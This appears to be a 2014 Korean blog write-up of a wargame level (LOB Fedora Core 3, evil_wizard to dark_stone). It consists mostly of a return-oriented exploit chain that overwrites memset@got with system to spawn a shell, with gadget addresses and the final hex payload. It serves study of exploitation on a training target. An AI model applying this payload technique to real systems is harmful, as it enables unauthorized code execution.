본문 바로가기
WARGAME/hackerschool ftz,lob

[LOB 페도라 FC3] evil_wizard -> dark_stone

LF0827 2014. 10. 9. 00:51

이전문제와 차이점은 실행 파일이 xinetd 데몬으로 돌아가고 있다는 점이다. 

아래와 같이 이전에서 사용했던 페이로드 구성과 동일하게 작성하여 memset@got을 system으로 덮어씌워 쉘을 얻었다. 


A*284

strcpy@plt ppr bss+0 \xc0

strcpy@plt ppr bss+1 \x07

strcpy@plt ppr bss+2 \x75

strcpy@plt ppr bss+3 \x00

strcpy@plt ppr memset@got+0 &bss+0

strcpy@plt ppr memset@got+1 &bss+1

strcpy@plt ppr memset@got+2 &bss+2

strcpy@plt ppr memset@got+3 &bss+3

strcpy@plt ppr bss+0 '/'

strcpy@plt ppr bss+1 'b'

strcpy@plt ppr bss+2 'i'

strcpy@plt ppr bss+3 'n'

strcpy@plt ppr bss+4 '/'

strcpy@plt ppr bss+5 's'

strcpy@plt ppr bss+6 'h'

strcpy@plt ppr bss+7 '\x0'

memset@plt AAAA bss



strcpy@plt 0x08048438

ppr 0x080484f3

bss 0x08049868

system 0x007507c0

memset@plt 0x08048428

memset@got 0x08049854



system -> 0x007507c0

\xc0 : 0x080484d9

\x07 : 0x08048364

\x75 : 0x080482b4

\x00 : 0x080482b6


'/' 0x08048114

'b'     0x08048117

'i' 0x08048116

'n' 0x0804811e

'/' 0x08048114

's' 0x08048122

'h' 0x080483ce

'\0' 0x080483cf


Ax284

\x38\x84\x04\x08\xf3\x84\x04\x08\x68\x98\x04\x08\xd9\x84\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x69\x98\x04\x08\x64\x83\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x6a\x98\x04\x08\xb4\x82\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x6b\x98\x04\x08\xb6\x82\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x54\x98\x04\x08\x68\x98\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x55\x98\x04\x08\x69\x98\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x56\x98\x04\x08\x6a\x98\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x57\x98\x04\x08\x6b\x98\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x68\x98\x04\x08\x14\x81\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x69\x98\x04\x08\x17\x81\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x6a\x98\x04\x08\x16\x81\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x6b\x98\x04\x08\x1e\x81\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x6c\x98\x04\x08\x14\x81\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x6d\x98\x04\x08\x22\x81\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x6e\x98\x04\x08\xce\x83\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x6f\x98\x04\x08\xcf\x83\x04\x08

\x28\x84\x04\x08\x41\x41\x41\x41\x68\x98\x04\x08

'WARGAME > hackerschool ftz,lob' 카테고리의 다른 글

[LOB 페도라 FC3] hell_fire -> evil_wizard  (0) 2014.10.08
[LOB 페도라 FC3] dark_eyes -> hell_fire  (2) 2014.09.05
[LOB 페도라 FC3] iron_golem -> dark_eyes  (0) 2014.08.31
[LOB 페도라 FC3] gate -> iron_golem  (6) 2014.08.30
[해커스쿨 ftz] 비밀번호  (0) 2014.08.29

'WARGAME/hackerschool ftz,lob' Related Articles

티스토리툴바